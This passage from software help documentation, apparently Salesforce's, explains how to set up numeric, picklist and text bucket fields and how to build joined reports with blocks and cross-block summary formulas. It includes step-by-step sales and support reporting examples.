Edit a Numeric Bucket Field
Numeric Bucketing Example: Deal Size
Edit a Picklist Bucket Field
Picklist Bucketing Example: Industry Types
Edit a Text Bucket Field
Enter Values for Text Buckets
Text Bucketing Example: Strategic Accounts
Add a Bucket Field
Add a Bucket Field
Edit a Bucket Field
Edit a Bucket Field
Enter Values for Text Buckets
Edit a Numeric Bucket Field
Numeric Bucketing Example: Deal Size
Edit a Picklist Bucket Field
Picklist Bucketing Example: Industry Types
Edit a Text Bucket Field
Text Bucketing Example: Strategic Accounts

Add a Bucket Field

Create a bucket field to contain the buckets into which you will organize your report data.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

You can add up to five bucket fields per report, each with up to 20 buckets.
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1. In the Fields pane of the report builder, double-click Add Bucket Field or drag it into the report preview. You can also
click a column menu for a field in the report and select Bucket this Field.

2. Edit the bucket field according to the field type.

• Edit a Numeric Bucket Field
• Edit a Picklist Bucket Field
• Edit a Text Bucket Field

See Also:
Categorize Data Quickly with Buckets
Categorize Data Quickly with Buckets

Edit a Bucket Field

Set up your bucket field by specifying the buckets that it contains and the values that go in the buckets.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

1. In the report builder Fields pane under Bucket Fields, hover over a bucket field and click . Or in the Preview pane, click
the bucket field column menu and select Edit Bucket Field.

2. Edit the bucket field according to the field type.

• Edit a Numeric Bucket Field
• Edit a Picklist Bucket Field
• Edit a Text Bucket Field

See Also:
Categorize Data Quickly with Buckets
Categorize Data Quickly with Buckets

Edit a Numeric Bucket Field

A numeric bucket helps you sort data that can be described in terms of numbers.

Available in: Enterprise, Unlimited, and Developer Editions
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User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

In the Edit Bucket Field overlay for a numeric field:

1. For Source Column, select the field you want to bucket.
2. Enter a bucket field name. This appears as the column name in the report.

Since a bucket field is intended to have multiple buckets (known as “ranges” in numeric bucket fields) within it, a good
name for a bucket field describes the scope of the ranges. For example, a bucket field named “Size” could have ranges of
“Small,” “Medium,” and “Large”.

3. Define your ranges by entering a number and a name. The range names appear as values in your new column.

Each range is greater than the lower number up to and including the higher number.

To remove all ranges and start over, click Clear All.

4. To move all empty values to the bucket containing the value zero, enable Treat empty source column values in
the report as zeros.

If this is disabled, unbucketed values appear as a dash (-) in the column.

5. Click OK.

In a report, numeric bucket columns are sorted by range values.

See Also:
Categorize Data Quickly with Buckets
Numeric Bucketing Example: Deal Size
Categorize Data Quickly with Buckets

Numeric Bucketing Example: Deal Size

To gain insight into your deals, use bucketing to group by deal size instead of looking at individual deals. This lets you
concentrate on the large deals that affect your quota the most.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

1. Create or edit a standard opportunity report.
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2. In the Fields pane of the report builder, double-click Add Bucket Field or drag it into the report.
3. For Source Column, select Amount.
4. For Bucket Field Name, enter Deal Size.
5. Under Define Ranges, enter 1000 in the first row. This represents the maximum for a small deal. Name this range Small.
6. Click Add and enter 25000 in the second row. This represents the maximum for a medium-size deal. Name this range

Medium.
7. By default, the last range is any amount over the previous range. You don’t need to enter a number for this range. Name

this range Large.
8. Click OK.

With numeric bucket fields, each range is greater than the lower number, up to and including the higher number. Once you’ve
set up this bucket field, amounts will be bucketed as follows:

BucketAmounts

Small1000 or less

Medium1001 to 25000

Large25001 or more

See Also:
Categorize Data Quickly with Buckets
Edit a Numeric Bucket Field

Edit a Picklist Bucket Field

A picklist bucket field contains items that can be selected from a list.

Available in: Enterprise, Unlimited, and Developer Editions
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User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

Note:  The following picklist types can’t be bucketed.

• Record types
• Divisions
• Multi-value picklists
• The Type picklist in Activity reports

In the Edit Bucket Field overlay for a picklist field:

1. For Source Column, select the field you want to bucket.
2. Enter a bucket field name. This appears as the column name in the report.

Since a bucket field is intended to have multiple buckets within it, a good name for a bucket field describes the scope of
the buckets. For example, a bucket field named “Priority” could have “High,” “Medium,” and “Low” buckets.

Important: Picklist bucket names must include one or more letters or symbols. If a picklist bucket field includes
a bucket whose name contains only numbers, the bucket field cannot be saved.

3. To create a bucket, click New Bucket and enter a bucket name. Create multiple buckets to group your report records.
4. To find a particular value in the list of values, type the first few characters of its name in the Quick Find box. As you type,

items that match your search terms appear in the menu.
5. Select values and drag them into a bucket. Alternatively, select values, click Move To, and select a bucket or enter a new

bucket name.

While you’re bucketing values, use these functions as needed:

• To show all the values in the report, click All Values.
• To show the values for a particular bucket, click the bucket name.
• To remove values from a bucket, select the values and drag them to another bucket, or drag them to Unbucketed

Values.

Note:  You can bucket only active picklist values. Inactive picklist values aren’t shown.

6. To move all unbucketed values into a bucket named “Other”, enable Show unbucketed values as “Other”. If this
is disabled, unbucketed values appear in the bucket column with the value name.

7. Click OK.
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In a report, picklist bucket columns are sorted by the bucket position as shown in the Edit Bucket Field dialog box, followed
by “Other” if Show unbucketed values as “Other” is enabled, or the unbucketed picklist item names if Show
unbucketed values as “Other” is disabled.

See Also:
Categorize Data Quickly with Buckets
Categorize Data Quickly with Buckets
Picklist Bucketing Example: Industry Types

Picklist Bucketing Example: Industry Types

Use a picklist bucket field to sort your accounts by their industry.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

1. Create or edit a standard accounts report, making sure at least a few records appear in the report.
2. In the Fields pane of the report builder, double-click Add Bucket Field or drag it into the report.
3. For Source Column, select Industry.
4. For Bucket Field Name, enter Industry Types.
5. Click New Bucket and name the bucket IT.
6. Click New Bucket and name the bucket Bio Tech.
7. Click New Bucket and name the bucket Telecom.
8. Select values and drag them into the appropriate buckets.
9. Enable Show unbucketed values as “Other”.
10. Click OK.
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See Also:
Categorize Data Quickly with Buckets
Edit a Picklist Bucket Field

Edit a Text Bucket Field

A text bucket helps you sort out values that consist of words or phrases.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

Note:  The following text types can’t be bucketed.

• Text area
• Text area—long
• Text area—rich
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• Text area—encrypted
• URL
• Date
• Date/Time

In the Edit Bucket Field overlay for a text field:

1. For Source Column, select the field you want to bucket.
2. Enter a bucket field name. This appears as the column name in the report.

Since a bucket field is intended to have multiple buckets within it, a good name for a bucket field describes the scope of
the buckets. For example, a bucket field named “Region” could have “East,” “West,” and “Central” buckets.

3. To create a bucket, click New Bucket and enter a bucket name. Create multiple buckets to group your report records.
4. To find a particular value in the list of values, type all or part of its name in the Search for values... box and click Search,

or leave the box empty and click Search.

The search returns up to 200 values.

5. Select values and drag them into a bucket. Alternatively, select values, click Move To, and select a bucket or enter a new
bucket name.

While you’re bucketing values, use these functions as needed:

• Use Enter Values to enter the exact name of a value you want to bucket, or to bucket values that may appear in your
report later.

• To show the values for a particular bucket, click the bucket name.
• To remove values from a bucket, select the values, select Move To, and select a bucket or enter a new bucket name.

6. To move all unbucketed values into a bucket named “Other,” enable Show unbucketed values as “Other”. If this
is disabled, unbucketed values appear in the bucket column with the value name.

7. Click OK.

In a report, text bucket columns are sorted in alphanumeric order.

See Also:
Categorize Data Quickly with Buckets
Enter Values for Text Buckets
Categorize Data Quickly with Buckets
Text Bucketing Example: Strategic Accounts

Enter Values for Text Buckets

A text bucket field needs a descriptive name and two or more buckets containing text strings.

Available in: Enterprise, Unlimited, and Developer Editions
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User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

If you know the exact value you want to bucket, you can use the Enter Values function to quickly bucket it without searching.
This is useful if your report has a large number (such as millions) of values and searching for a value is slow. You can also use
this method to enter and bucket values that may appear in your report later.

In the Edit Bucket Field overlay for a text field:

1. Click Enter Values.
2. Select the bucket where you want to move the values. If you select New Bucket, enter a name for the bucket.
3. Type one or more values in the box. Enter multiple values on separate lines.
4. Click Move.

See Also:
Categorize Data Quickly with Buckets
Edit a Text Bucket Field

Text Bucketing Example: Strategic Accounts

Use a text bucket to sort accounts into general categories that you can act on.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

1. Create or edit a standard account report, making sure at least a few records appear in the report.
2. In the Fields pane of the report builder, double-click Add Bucket Field or drag it into the report.
3. For Source Column, select Account Name.
4. For Bucket Field Name, enter Strategic.
5. Click New Bucket and name the bucket IBM.
6. Click New Bucket and name the bucket Dell.
7. Click New Bucket and name the bucket HP.
8. To show the available values, leave the Search for values... box empty and click Search.
9. Select values and drag them into the appropriate buckets.
10. Enable Show unbucketed values as “Other”.
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11. Click OK.

See Also:
Categorize Data Quickly with Buckets
Edit a Text Bucket Field

Combine Different Types of Information in a Joined Report
The joined report format lets you view different types of information in a single report. A joined report can contain data from
multiple standard or custom report types.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

Watch a Demo: Introducing Joined Reports in Salesforce (3:19 minutes)
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To get started with joined reports, create a new or edit an existing report in report builder, click the Format drop-down, and
choose Joined.

Most of the things you can do with summary or matrix reports you can also do with joined reports. For example, you can find,
add, and remove fields; summarize fields; and run and save reports.

Currently, you can’t do the following with joined reports:

• Add bucketed fields.

• Add cross filters.

• Drag and drop filters from the Fields pane on to the Filter pane.

• Apply conditional highlighting.

• Change the hierarchy for opportunity or activity reports.

• Create analytics snapshots based on joined reports.

• You can’t filter data on a joined report in dashboard view or add a filter to a dashboard that only has joined reports.

You can show a joined report that includes a chart on a dashboard. Edit the joined report dashboard component and select
Use chart as defined in the source report.

See Also:
Get the Right Data into Your Report
How Joined Reports Work
Run a Joined Report
Change the Principal Report Type
Add a Report Type to a Joined Report
Are Any Report Types Unavailable with Joined Reports?
Custom Summary Formulas with Joined Reports
Build a Custom Summary Formula for a Joined Report
Work with Blocks
Joined Report Examples
Build a New Report
How Joined Reports Work

How Joined Reports Work

A joined report can contain data from multiple standard or custom report types. You can add report types to a joined report
if they have relationships with the same object or objects. For example, if you have a joined report that contains the Opportunities
report type, you can add the Cases report type as well because both have a relationship with the Accounts object.

Available in: Enterprise, Unlimited, and Developer Editions

A joined report consists of up to five report blocks, which you add to the report to create multiple views of your data. For each
block, you can add regular and summary fields, create standard and cross-block custom summary formulas, apply filters, and
sort columns. You apply groupings across all blocks in the report, and can add up to three groupings to the blocks, the same
as for the summary format. You can also add a chart to a joined report.
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When a joined report contains multiple report types, some fields are identified as common fields. A field is a common field if
it’s shared by all report types or if all report types share a lookup relationship to the field. These fields appear in the Common
Fields area in the Fields pane, and can be used to group report blocks.

Each joined report has a principal report type. By default, the principal type is the first one added to the report, and is identified
in the Fields pane with a small dot beside its name. For example, if you create the joined report by selecting the Opportunities
report type, and then add the Cases type, the Opportunities type is the principal report type.

The principal report type controls how common fields are named. Some common fields have different names or appear in

different sections in different report types. In those fields, click  to see the name of the field in other report types.

Most of the things you can do with summary or matrix reports you can also do with joined reports. For example, you can find,
add, and remove fields; summarize fields; and run and save reports. However, there are some things you can’t do:

• Add bucketed fields.

• Add cross filters.

• Drag and drop filters from the Fields pane on to the Filter pane.

• Apply conditional highlighting.

• Change the hierarchy for opportunity or activity reports.

• Create analytics snapshots based on joined reports.

• When Chatter is disabled, joined reports can’t be tagged.

Note:

• For users to be able to create and edit joined reports, report builder must be enabled for your entire organization.
When report builder isn’t enabled, users can run joined reports, but can’t create them.

• Joined reports require that the new user interface theme is enabled. Users without the new theme are unable to
create, edit, or run joined reports.

• Internet Explorer 6 is not supported for joined reports.

• You can’t filter data on a joined report in dashboard view or add a filter to a dashboard that only has joined reports.

• How Joined Reports Work on page 2683

• Running Joined Reports on page 2685

• Changing the Principal Report Type on page 2685

• Adding a Report Type to a Joined Report on page 2686

• Are Any Report Types Unavailable with Joined Reports? on page 2687

• Custom Summary Formulas with Joined Reports on page 2688

• Building Custom Summary Formulas for Joined Reports on page 2690

• Working with Blocks on page 2691

See Also:
Combine Different Types of Information in a Joined Report
Build a New Report
Joined Report Examples
Combine Different Types of Information in a Joined Report
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Run a Joined Report

Joined reports run in an updated version of the run reports page.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Run Reports”To run reports:

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

From the joined reports run page, you can:

• Click Run Report to run the report.

• Show or hide details

• Click Customize to open the report in report builder.

• Save or delete the report.

• Click Report Properties to change the report's name, description, or folder.

• View the report generation status.

See Also:
Combine Different Types of Information in a Joined Report
Run a Report
How Joined Reports Work

Change the Principal Report Type

The principal report type controls how common fields are named. A joined report must have a principal report type. You can
change the principal report type at any time

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

By default, the first report type you add to the report is the principal.
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The principal report type doesn’t affect what data is available for reporting.

Change the principal report type by removing its blocks. To remove a block, drag it to the Fields pane. If there are multiple
blocks based on the principal report type, you must remove them all.

When you remove the principal report type, the way the new report type is selected depends on how many report types the
report contains.

• If the report contains only two report types, the other report type automatically becomes the principal.
• If the report contains more than two report types, a dialog displays that prompts you to pick one of them as the new

principal report type.

See Also:
Combine Different Types of Information in a Joined Report
Add a Block to a Joined Report
Add a Report Type to a Joined Report
Run a Joined Report
Are Any Report Types Unavailable with Joined Reports?
Combine Different Types of Information in a Joined Report

Add a Report Type to a Joined Report

Adding a report type lets you expand the set of data available for analysis in a joined report.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

1. Select Joined from the report format menu.
2. Click Add Report Type.

The Choose an Additional Report Type overlay appears and displays the report types that you can add to the existing
report.

3. Select the report type.

The overlay displays a message that identifies the objects that are common to the selected report type and the types already
included in the report.

4. Click OK.

The additional report type is added. Notice that:

• A new block appears in the report.
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• The Fields pane updates with a new area that contains fields unique to the report type. Fields common to all report types
are in the Common Fields area.

See Also:
Combine Different Types of Information in a Joined Report
Build a Custom Summary Formula for a Joined Report
How Joined Reports Work
Combine Different Types of Information in a Joined Report

Are Any Report Types Unavailable with Joined Reports?

Some standard report types can’t be used in the joined report format.

Available in: Enterprise, Unlimited, and Developer Editions

The standard report types listed below can’t be used in the joined report format. When reviewing the list, keep the following
in mind:

• You might not have access to all the report types listed here. Certain factors can affect the report types you see, such as
which features your organization has enabled and how your administrator has set up report folder visibility. Check with
your administrator if you think you should see a report type that you don’t.

• If your organization has renamed standard objects, the names of the standard report types will contain your organization’s
names instead of the original ones. For example, if your organization has renamed the “Opportunity” object as “Deal,” the
standard report type “Opportunity Field History” will be renamed “Deal Field History.”

• In the list below, report types marked with an asterisk (*) aren’t available when you create a new report. Instead, you access
them by customizing standard reports, which are in folders on the Reports tab.

These report types aren’t available for use in joined reports.

• Accounts and Contacts

◊ Account History
◊ Account Owners*
◊ Contact History

• Activities

◊ My Delegated Approval Requests*

• Administrative

◊ All Pending Approval Requests*
◊ API Usage Last 7 Days*

• Campaign

◊ Campaign Call Down*
◊ Campaign Member
◊ Campaign Member Analysis*
◊ Campaigns with Influenced Opportunities
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• Contract

◊ Contract History
◊ Order History

• Customer Support

◊ Case History
◊ Self Service Usage
◊ Solution History

• Forecasts

◊ Customizable Forecasting: Forecast History
◊ Customizable Forecasting: Forecast Summary
◊ Customizable Forecasting: Opportunity Forecasts
◊ Forecast History
◊ Forecasts
◊ Quota versus Actual*

• Lead

◊ Lead All
◊ Lead History
◊ Lead Status*

• Opportunity

◊ Opportunities with Contact Roles and Products
◊ Opportunities with Opportunity Teams and Products
◊ Opportunity Field History

• Price Books, Products and Assets

◊ Assets without Products*

See Also:
Combine Different Types of Information in a Joined Report
Choose a Report Type
Change the Principal Report Type
Combine Different Types of Information in a Joined Report
Build a Report From a Template

Custom Summary Formulas with Joined Reports

Two types of custom summary formulas are available with joined reports: standard and cross-block.

Available in: Enterprise, Unlimited, and Developer Editions
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Standard Custom Summary Formulas

Standard custom summary formulas apply to one report type, and can be added to blocks that are based on that report type
only. For example, a summary formula created for the Cases report type can only be applied to Cases blocks. Custom summary
formulas in joined reports support the same data formats, formula options, functions, and calculation display locations as they
do with summary and matrix reports.

Keep the following in mind when working with custom summary formulas in joined reports.

• The formulas aren’t automatically added to the report when you create them. To add a formula, drag it to a block with the
same report type.

• When you add custom summary formulas to a block, they appear to the right of the standard fields in the order in which
you added them to the block. If you also add cross-block custom summary formulas, they appear to the right of the standard
ones.

• The results of custom summary formulas are affected by the filter options applied to the blocks they’re included in. As a
result, the same formula can yield different results in different blocks.

• You can add up to 10 custom summary formulas to each block in a joined report. A joined report can have a total of 50
custom summary formulas.

• Each custom summary formula must have a unique name. However, standard and cross-block custom summary formulas
can have the same name.

• Custom summary formula names can’t include brackets ( “[“ or “]”).

Cross-Block Custom Summary Formulas

Cross-block custom summary formulas let you calculate values across multiple blocks in a joined report. For example, you can
use a cross-block formula to calculate the ratio of open to closed opportunities for an account or the ratio of closed pipeline
deals to sales targets.

Building a cross-block formula is similar to creating a standard one. The same data formats, formula options, functions, and
calculation display locations are available. The formula syntax is also similar, except that block information is also included.
For example, when calculating the ratio of opportunities to cases for each account, the formula also includes the block title:
[Opportunities block 1]RowCount / [Cases block 2]RowCount. Note that if you omit block title, you see an
error message when you check formula syntax or save the formula.

Keep the following in mind when working with cross-block custom summary formulas.

• You can add a cross-block formula to any block in the report.
• Cross-block formulas aren’t automatically added to the report when you create them. To add a formula, drag it to a block.
• When you add cross-block formulas to a block, they appear to the right of standard ones in the order in which you add

them to the block.
• The results of cross-block formulas are affected by the filter options applied to the blocks in the report. As a result, a

cross-block formula can yield different results when you change filter options.
• Each joined report can have up to 10 cross-block custom summary formulas.
• Deleting a block that’s used in a cross-block formula also deletes the formula from both the Fields pane and any remaining

blocks containing it.
• Each cross block formula must have a unique name. However, standard and cross-block custom summary formulas can

have the same name.
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• Cross-block formula names can’t include brackets ( “[“ or “]”).

See Also:
Combine Different Types of Information in a Joined Report
Build a Custom Summary Formula
Get the Most Out of Custom Summary Formulas
Joined Report Examples
Build a Custom Summary Formula for a Joined Report

Build a Custom Summary Formula for a Joined Report

You can add standard or cross-block custom summary formulas for joined reports to calculate additional totals based on the
numeric fields available in the report.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

1. Use one of these options to access the Add Summary Formula overlay from the Fields pane.

DescriptionOption

Go to the report type category, and double-click Add
Formula

To create a standard custom summary formula

Go to the Common category and double-click Add Cross
Block Formula

To create a cross-block custom summary formula

2. Enter a name for the formula as you want it to appear in the report, and optionally a description.

The name must be unique.

3. From the Format drop-down list, select the appropriate data type for your formula based on the output of your calculation.
4. From the Decimal Places drop-down, select the number of decimal places to display for currency, number, or percent

data types. This setting is ignored for currency fields in multicurrency organizations. Instead, the Decimal Places for
your currency setting apply.

5. Set the Where will this formula be displayed? option.

The calculated value displays in the report block at either the Grand Total or the global grouping level, depending on
which you select. To display the formula calculation at every level, including the Grand Total, select All summary
levels. Optionally you can select to show the calculation at a global grouping level. You can have three global groupings
in a joined report. The groupings apply across all blocks.
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6. Build your formula:

a. Select one of the fields listed in the Summary Fields drop-down list. This field’s value is used in your formula.

When creating a cross-block formula, the fields are grouped by block. You can also use Quick Find to search for a field.

When creating a single-report type formula, the list displays numeric fields available for the report type.

b. Select the kind of summary type to use in your formula. This option is not available for Record Count.

DescriptionSummary Type

The summary value of data in a field or grouping of fields.Sum

The largest value of data in a field or grouping of fields.Largest Value

The smallest value of data in a field or grouping of fields.Smallest Value

The average of data in a field or grouping of fields.Average

c. Click Operators to add operators to your formula.
d. Select the function category (All, Logical, Math, or Summary), choose the function you want to use in your formula,

and click Insert.
e. Repeat these steps as necessary.

7. Click Check Syntax to see if your formula contains errors. Errors are highlighted by the cursor.
8. Click OK. Your formula isn't saved until you save the report.

See Also:
Combine Different Types of Information in a Joined Report
Work with Formulas in Report Builder
Custom Summary Formulas with Joined Reports
Get the Most Out of Custom Summary Formulas
Joined Report Examples

Work with Blocks

Blocks let you create different views of the information contained in a joined report.

Available in: Enterprise, Unlimited, and Developer Editions
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User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

See Also:
Combine Different Types of Information in a Joined Report
Add a Block to a Joined Report
Reorder Blocks
Rename a Block
Show and Hide the Record Count for a Block
Delete a Block
Run a Joined Report
Combine Different Types of Information in a Joined Report

Add a Block to a Joined Report

Adding blocks to joined reports lets you create multiple views of the data included in a single report.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

1. Click and hold a field from the Fields pane, then drag it to the empty area of the Preview pane.
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2. Drop the field to create the block.

When you’ve added the block, notice that standard and field filters for the additional block are added to the Filters pane
(1). Also, the new block appears in the Preview pane (2).

To delete a block, click  in the block header, then click Remove Block. Or just drag the block to the Fields pane.

Keep the following in mind when working with blocks.

• Adding a new report type to a joined report also adds a new block.
• You must choose a field from a report type category when creating a block. You can’t use a field from the Common category.

For example, if your report contains both the Opportunities and the Cases report types, choosing a field from the
Opportunities category creates a new Opportunities block, while choosing a field from the Cases category creates a new
Cases block.

See Also:
Work with Blocks
Add a Report Type to a Joined Report
Delete a Block
Build a Custom Summary Formula for a Joined Report
Work with Blocks
Combine Different Types of Information in a Joined Report

Reorder Blocks

You can reorder blocks in a joined reports. Reordering blocks affects the report’s appearance but doesn’t affect the data in the
blocks.

Available in: Enterprise, Unlimited, and Developer Editions
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User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

When you reorder blocks, block numbers don't change. For example, if you have a report containing three blocks, and you
move block 1 to a new position to the right of block 3, the blocks now display as block 2, block 3, and block 1. You should
rename the blocks to avoid confusion.

When reordering a block, you move it to either the left or right of an existing block. You can’t drag it to an empty area in the
Preview pane.

To reorder a block:

• In the Preview pane, drag the block to either the left or right side of an existing block.

A blue bar beside the block indicates an acceptable drop location.

See Also:
Work with Blocks
Rename a Block
Work with Blocks

Rename a Block

You can rename blocks to provide more user-friendly descriptions of the information they contain.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

When you add a block to a joined report, it’s named automatically based on the report type and the number of blocks in the
report. For example, if your report contains two blocks and you add a new block that’s based on the Opportunities report type,
it’s named Opportunities block 3.

1. Click the block’s name.
The name now appears in an editable text box.

2. Enter the new name.
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3. Press Enter or click outside the block to apply the name.

See Also:
Work with Blocks
Work with Blocks
Combine Different Types of Information in a Joined Report

Show and Hide the Record Count for a Block

You can choose to show or hide the number of records, or record count, for each block in a joined report. By default, record
count is displayed for each block in the report builder and on the run reports page.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

You can hide or show record count two ways.

• Click the arrow in the block header (  ) to display the block menu. The check mark beside the Record Count menu
item shows that record count is enabled for the block. Click Record Count to toggle between showing and hiding the
count.

• When you’ve hidden report details, position the cursor over the Record Count column to display an arrow (  ). Click
the arrow, and select Remove Column. To display record count again, click the arrow in the block header and select
Record Count.

Note:  If you haven’t summarized any rows in your report blocks and have also hidden both details for the report and
row counts for all blocks, your blocks will be hidden on the run reports page. To display the blocks, choose Show
Details from the run reports page or the report builder.

See Also:
Work with Blocks
Run a Joined Report
Show and Hide Report Details
Use a Summary Function in a Report Formula
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Delete a Block

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

There are two ways to delete a block from a joined report.

• Click the arrow in the block header (  ) to display the block menu, then click Remove Block.
• Click and hold in the block header, and drag the block to the Fields pane.

See Also:
Work with Blocks
Work with Blocks
Combine Different Types of Information in a Joined Report

Joined Report Examples

Creating a sales rep performance scorecard, reviewing support cases by status, and predicting your opportunity pipeline are
some examples of what you can do with joined reports.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Run Reports”To run reports:

“Create and Customize Reports”

AND

“Report Builder”

To create, edit, and delete reports:

This topic provides examples of the types of reporting you can do with joined reports.

Creating a Sales Rep Performance Scorecard

A sales rep scorecard lets your sales management team understand the performance and actions of your organization’s sales
reps. To create it, you need to have three separate custom report types, each of which creates a relationship between User (as
the primary object) and one of the following three objects: Opportunity Owner, Opportunity Creator, and Activity Owner.
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Note that, in this example, we’ve named the custom report types User and Opportunity Owner Custom Report,
User and Opportunity Creator Custom Report, and User and Activity Owner Custom Report.

Start by creating a new custom report based on the User and Opportunity Owner custom report type, and then add the User
and Opportunity Creator and User and Activity owner custom report types as two additional blocks. Then, group by Sales
Rep (opportunity owner) and set the filters as described in the procedure.

To create the report:

1. Create a new report, selecting User and Opportunity Owner Custom Report as the report type.
2. Select Joined from the Format drop-down.
3. Click Add Report Type.
4. Select User and Opportunity Creator Custom Report.
5. Click Add Report Type again, and choose User and Activity Owner Custom Report.
6. Group the blocks by Full Name.
7. Add additional fields and filters to the report as needed. For example, you might want to change the date filters to focus

on rep performance during a particular time frame. Or, to make sure that only sales people are included as opportunity
owners, create a filter on the Role: Name filter limit your results to users with “Sales” in their roles.

8. Optionally, provide names for the blocks.
9. Click Save or Run Report.

Reviewing Support Cases by Status

You can also create a report comparing the number of support cases that are new, closed, or in-progress by priority. The report
contains a single standard report type: Cases. First, create the report, add three blocks to the report, filter each block by the
appropriate status, and then use the Priority field for grouping.

To create the report:

1. Create a new report, selecting Cases as the report type.
2. Select Joined from the Format drop-down.
3. Remove unwanted fields by dragging them to the Fields pane.
4. Create three blocks, each containing the Case Number and Status and, optionally, Case Owner fields.
5. For each block, filter on all cases. Then, filter each of the blocks by Status as follows:

• Block 1: Status equals Closed

• Block 2: Status equals New

• Block 3: Status not equal to Closed, New, Closed in Portal, Closed — First Call
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6. Group the blocks by Priority.
7. Optionally, rename the blocks.
8. Click Save or Run Report.

Predicting Opportunity Pipeline

Using cross-block custom summary formulas, you can create a report that predicts future opportunity revenue based on your
sales reps’ past performance. Create a report based on the Opportunities standard report type, add three blocks to the report,
filter each block by the appropriate status, and then create a formula that uses fields from different blocks.

To create the report:

1. Create a new joined report, selecting Opportunities as the report type.
2. Remove unwanted fields by dragging them to the Fields pane.
3. Create three blocks, each containing the Opportunity Name, Account Name and Amount fields.
4. For each block, show All Opportunities. Then, filter each block.

FiltersBlock

Opportunity Status equals Closed

Date Field equals Close Date

Block 1

Range equals Current and Previous FY

Stage equals Closed Lost

Opportunity Status equals Closed Won

Date Field equals Close Date

Block 2
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FiltersBlock

Range equals Current and Previous FY

Date Field equals Close Date

Range equals Next Month

Block 3

Opportunity Status equals Open

5. Group the blocks by Opportunity Owner.
6. Rename the blocks. For example, “Closed — Won”, “Close — Lost”, and “Closing Next Month”.
7. Create a cross-block custom summary formula that predicts upcoming revenue based on past sales rep performance:

[Closing Next Month]AMOUNT:SUM*([Closed - Won]RowCount/([Closed -
Lost]RowCount+[Closed - Won]RowCount))

8. Add the formula to one or more of the blocks.
9. Optionally, add a cross-block custom summary formula that calculates the win ratio of each sales rep:

[Closed - Won]RowCount/([Closed - Lost]RowCount+[Closed - Won]RowCount)

10. Click Save or Run Report.

Adding a Chart to the Opportunity Pipeline Predictor Report

You can include a chart with a joined report to provide a visual representation of the data. For example, you can add a chart
to the Opportunity Pipeline Predictor report that shows actual versus predicted revenue.

To add the chart:

1. Create the Predicting Opportunity Pipeline report.
2. Click Add Chart.
3. For the Y-axis, select Closed — Won — Sum of Amount.
4. Select Plot additional values.
5. Select Line for the Display option, and Predicted Revenue as the Value.
6. Click the Formatting tab, and enter Actual versus Predicted Revenue as the chart title.
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7. Click OK.
8. Click Save or Run Report.

See Also:
Combine Different Types of Information in a Joined Report
Add a Chart to a Report
Custom Summary Formulas with Joined Reports
How Joined Reports Work
Run a Joined Report
Work with Blocks
Combine Different Types of Information in a Joined Report
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Communicate Your Report Data Effectively
A report produces information in the form of a table. You can set up that table to help people scan quickly for the information
they need. You can also add a graph to help users understand the data visually, and you can display the report’s data on a
dashboard.

See Also:
Gather Data with Reports
Show Report Data in Tables
Show Report Data Graphically
Deliver Your Report
Share Reports and Dashboards
Report on Salesforce Data with Excel
Report on Historical Data with Analytic Snapshots
Upgrade Report Builder
Troubleshoot Reports
Show Report Data Graphically
Show Report Data in Tables

Show Report Data in Tables
To help readers scan for data easily, try hiding details and ranges, limiting the number of results shown, and highlighting with
color. You can also show your table in a dashboard component.

See Also:
Communicate Your Report Data Effectively
Show and Hide Report Details
Highlight Data Ranges
Use a Tabular Report in a Dashboard
Limit Report Results
Highlight Data Ranges
Limit Report Results
Show and Hide Report Details
Use a Tabular Report in a Dashboard

Show and Hide Report Details

You can show or hide report details from either the run reports page or the report builder. When you hide details, individual
records don’t display in the report. Groupings, summary formulas, and record counts remain visible.

Available in: All editions except Database.com
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User Permissions Needed

“Run Reports”To run reports:

“Create and Customize Reports”

AND
“Report Builder”

To create, edit, and delete reports:

• From the run reports page, click Hide Details to hide individual records. Click Show Details to show all records.

• From the report builder, click Show > Details. A check mark beside the Details menu item means that details are displayed.
Click Details to toggle between showing or hiding records.

See Also:
Show Report Data in Tables
Show and Hide the Record Count for a Block
Build a New Report
Combine Different Types of Information in a Joined Report

Highlight Data Ranges

Highlight field values on summary or matrix reports based on ranges and colors you specify. To enable conditional highlighting,
your report must contain at least one summary field or custom summary formula.

Available in: All editions except Database.com

